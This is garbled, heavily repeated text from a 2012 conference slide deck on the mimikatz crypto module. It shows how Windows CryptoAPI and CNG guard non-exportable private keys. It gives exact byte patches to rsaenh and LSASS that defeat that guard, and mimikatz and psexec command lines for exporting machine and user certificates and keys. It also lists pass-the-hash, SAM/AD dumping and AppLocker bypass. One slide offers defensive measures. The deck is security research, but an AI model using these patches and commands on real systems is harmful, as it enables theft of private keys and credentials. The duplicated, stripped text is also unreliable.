CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
